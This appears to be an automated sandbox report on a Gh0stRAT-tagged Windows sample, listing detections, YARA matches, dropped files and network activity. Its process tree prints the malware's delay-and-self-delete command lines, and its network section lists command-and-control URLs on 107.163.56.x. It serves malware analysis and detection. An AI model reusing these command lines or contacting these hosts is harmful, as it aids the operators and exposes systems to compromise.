Edit tour

Windows Analysis Report
02hNixBIvP.exe

Overview

General Information

Sample Name:	02hNixBIvP.exe
Analysis ID:	801466
MD5:	003f93a1f33ec617b46a87c98b19fd85
SHA1:	cebe846ccb643f8f843206d52cd701b02c1708f3
SHA256:	3c096962f3f447b1a0d136c730f0d979faafb01f22eddedccfc801bc167e0925
Tags:	exeGh0stRAT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Connects to many ports of the same IP (likely port scanning)

Machine Learning detection for sample

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Deletes itself after installation

Machine Learning detection for dropped file

Queries disk data (e.g. SMART data)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality for execution timing, often used to detect debuggers

Entry point lies outside standard sections

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Queries information about the installed CPU (vendor, model number etc)

Drops PE files

Detected TCP or UDP traffic on non-standard ports

Dropped file seen in connection with other malware

Queries disk information (often used to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

02hNixBIvP.exe (PID: 3332 cmdline: C:\Users\user\Desktop\02hNixBIvP.exe MD5: 003F93A1F33EC617B46A87C98B19FD85)

cmd.exe (PID: 5212 cmdline: cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 2244 cmdline: ping 127.0.0.1 -n 2 MD5: 70C24A306F768936563ABDADB9CA9108)

ifaie.exe (PID: 5244 cmdline: C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe" MD5: A14885E3017A4DDC08143092526DFC7B)

hcl.exe (PID: 4908 cmdline: "c:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink C:\Users\user\AppData\Local\Temp\ifaie.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

hcl.exe (PID: 6452 cmdline: "C:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 6480 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\Program Files\lhnfbdjfh" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 6520 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

hcl.exe (PID: 6588 cmdline: "C:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 6616 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\Program Files\lhnfbdjfh" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 6664 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
02hNixBIvP.exe	CN_Honker_Webshell	Sample from CN Honker Pentest Toolset - file Webshell.exe	Florian Roth (Nextron Systems)	0x3cf91:$s1: Windows NT users: Please note that having the WinIce/SoftIce 0x3cc23:$s2: Do you want to cancel the file download? 0x3d07b:$s3: Downloading: %s

Dropped Files

Source	Rule	Description	Author	Strings
C:\Program Files\lhnfbdjfh\hclyc.dll	Winnti_NlaifSvc	Winnti sample - file NlaifSvc.dll	Florian Roth (Nextron Systems)	0xa6ae:$x1: cracked by ximo 0xe1b3:$x1: cracked by ximo
C:\Users\user\AppData\Local\Temp\ifaie.exe	CN_Honker_Webshell	Sample from CN Honker Pentest Toolset - file Webshell.exe	Florian Roth (Nextron Systems)	0x3cf91:$s1: Windows NT users: Please note that having the WinIce/SoftIce 0x3cc23:$s2: Do you want to cancel the file download? 0x3d07b:$s3: Downloading: %s

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.hcl.exe.10000000.1.unpack	Winnti_NlaifSvc	Winnti sample - file NlaifSvc.dll	Florian Roth (Nextron Systems)	0x30ab2:$x1: cracked by ximo 0x30b6c:$x1: cracked by ximo 0x30c26:$x1: cracked by ximo 0x30ce0:$x1: cracked by ximo 0x30d9a:$x1: cracked by ximo 0x30e54:$x1: cracked by ximo 0x30f0e:$x1: cracked by ximo 0x30fc8:$x1: cracked by ximo 0x3c38d:$x1: cracked by ximo 0x3fe92:$x1: cracked by ximo
4.2.ifaie.exe.400000.0.unpack	Winnti_NlaifSvc	Winnti sample - file NlaifSvc.dll	Florian Roth (Nextron Systems)	0x28fae:$x1: cracked by ximo 0x2cab3:$x1: cracked by ximo

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 02hNixBIvP.exe	ReversingLabs: Detection: 92%
Source: 02hNixBIvP.exe	Virustotal: Detection: 78%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: 02hNixBIvP.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://107.163.56.232:18963/main.phpeB	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpni	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.php;	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpl4w	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpw	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpl4-	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpz	Avira URL Cloud: Label: malware
Source: http://107.163.56.231:18530/	Avira URL Cloud: Label: malware
Source: http://107.163.56.110:18530/u1129.html	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpl4	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpE&	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.php_	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpl4S	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.php	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpnif&~d	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpS	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpC:	Avira URL Cloud: Label: malware
Source: http://107.163.56.110:18530/u1129.htmlIE	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpe	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.php-	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.php.	Avira URL Cloud: Label: malware
Source: http://107.163.56.231:18530//joy.asp?sid=rungnejcodyYreveFe5vteX8v2LUicbtudb8mtiWmZiZmte	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpk	Avira URL Cloud: Label: malware
Source: http://107.163.56.232:18963/main.phpanifests	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Program Files\lhnfbdjfh\hclyc.dll	Avira: detection malicious, Label: TR/ATRAPS.Gen

Machine Learning detection for sample

Source: 02hNixBIvP.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Joe Sandbox ML: detected
Source: C:\Program Files\lhnfbdjfh\hclyc.dll	Joe Sandbox ML: detected

Source: 4.0.ifaie.exe.400000.0.unpack	Avira: Label: ADSPY/AdSpy.Gen
Source: 0.0.02hNixBIvP.exe.400000.0.unpack	Avira: Label: ADSPY/AdSpy.Gen

Source: 02hNixBIvP.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Directory created: c:\Program Files\lhnfbdjfh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Directory created: c:\Program Files\lhnfbdjfh\hclyc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Directory created: c:\Program Files\lhnfbdjfh\hcl.exe	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Directory created: c:\Program Files\lhnfbdjfh\12032311	Jump to behavior

Source:	Binary string: rundll32.pdb source: hcl.exe, 00000005.00000002.524559673.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000011.00000002.341464281.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000015.00000000.354210355.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe.4.dr
Source:	Binary string: rundll32.pdbGCTL source: hcl.exe, 00000005.00000002.524559673.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000011.00000002.341464281.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000015.00000000.354210355.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe.4.dr

Source: C:\Program Files\lhnfbdjfh\hcl.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\microsoft.system.package.metadata\	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	File opened: C:\Program Files\WindowsApps\Deleted\	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\AppTiles\	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\	Jump to behavior

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 107.163.56.232 ports 18963,1,3,6,8,9
Source: global traffic	TCP traffic: 107.163.56.231 ports 18530,0,1,3,5,8
Source: global traffic	TCP traffic: 107.163.56.110 ports 18530,0,1,3,5,8

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2

Source: global traffic

TCP traffic: 192.168.2.3:49702 -> 202.108.0.52:80

Source: global traffic	TCP traffic: 192.168.2.3:49695 -> 107.163.56.231:18530
Source: global traffic	TCP traffic: 192.168.2.3:49696 -> 107.163.56.110:18530
Source: global traffic	TCP traffic: 192.168.2.3:49698 -> 107.163.56.251:6658
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 107.163.56.232:18963

Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232

Source: hcl.exe, 00000005.00000002.525969199.000000000573E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://107.16
Source: hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163
Source: hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.110:18530/u1129.html
Source: hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.110:18530/u1129.htmlIE
Source: hcl.exe, 00000005.00000002.527979473.0000000010012000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: http://107.163.56.231:18530/
Source: hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.231:18530//joy.asp?sid=rungnejcodyYreveFe5vteX8v2LUicbtudb8mtiWmZiZmte
Source: hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.php
Source: hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.php-
Source: hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.php.
Source: hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.php;
Source: hcl.exe, 00000005.00000002.526014230.00000000059DA000.00000004.00000010.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.525980892.00000000057BE000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpC:
Source: hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpE&
Source: hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpS
Source: hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.php_
Source: hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpanifests
Source: hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpe
Source: hcl.exe, 00000005.00000003.505645297.0000000002E85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpeB
Source: hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpk
Source: hcl.exe, 00000005.00000003.505645297.0000000002E85000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpl4
Source: hcl.exe, 00000005.00000003.505645297.0000000002E85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpl4-
Source: hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpl4S
Source: hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpl4w
Source: hcl.exe, 00000005.00000003.469390389.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpni
Source: hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpnif&~d
Source: hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpw
Source: hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpz
Source: hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:n/u/5762479093
Source: hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.c
Source: hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.c18963/main.php
Source: hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093
Source: hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093#
Source: hcl.exe, 00000005.00000002.526057154.0000000005B5C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093$
Source: hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093)
Source: hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.469390389.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093.
Source: hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/576247909384
Source: hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093M
Source: hcl.exe, 00000005.00000003.505645297.0000000002E85000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093S
Source: hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093_
Source: hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093e
Source: hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093i(&
Source: hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093k
Source: hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.469390389.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093ni
Source: hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093niE
Source: hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093q&Kd
Source: hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093z
Source: hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.wP

Source: unknown

DNS traffic detected: queries for: blog.sina.com.cn

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.hcl.exe.10000000.1.unpack, type: UNPACKEDPE	Matched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth (Nextron Systems)
Source: 4.2.ifaie.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth (Nextron Systems)
Source: C:\Program Files\lhnfbdjfh\hclyc.dll, type: DROPPED	Matched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth (Nextron Systems)

Source: 02hNixBIvP.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 02hNixBIvP.exe, type: SAMPLE	Matched rule: CN_Honker_Webshell date = 2015-06-23, author = Florian Roth (Nextron Systems), description = Sample from CN Honker Pentest Toolset - file Webshell.exe, score = c85bd09d241c2a75b4e4301091aa11ddd5ad6d59, reference = Disclosed CN Honker Pentest Toolset, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.hcl.exe.10000000.1.unpack, type: UNPACKEDPE	Matched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth (Nextron Systems), description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.ifaie.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth (Nextron Systems), description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Program Files\lhnfbdjfh\hclyc.dll, type: DROPPED	Matched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth (Nextron Systems), description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
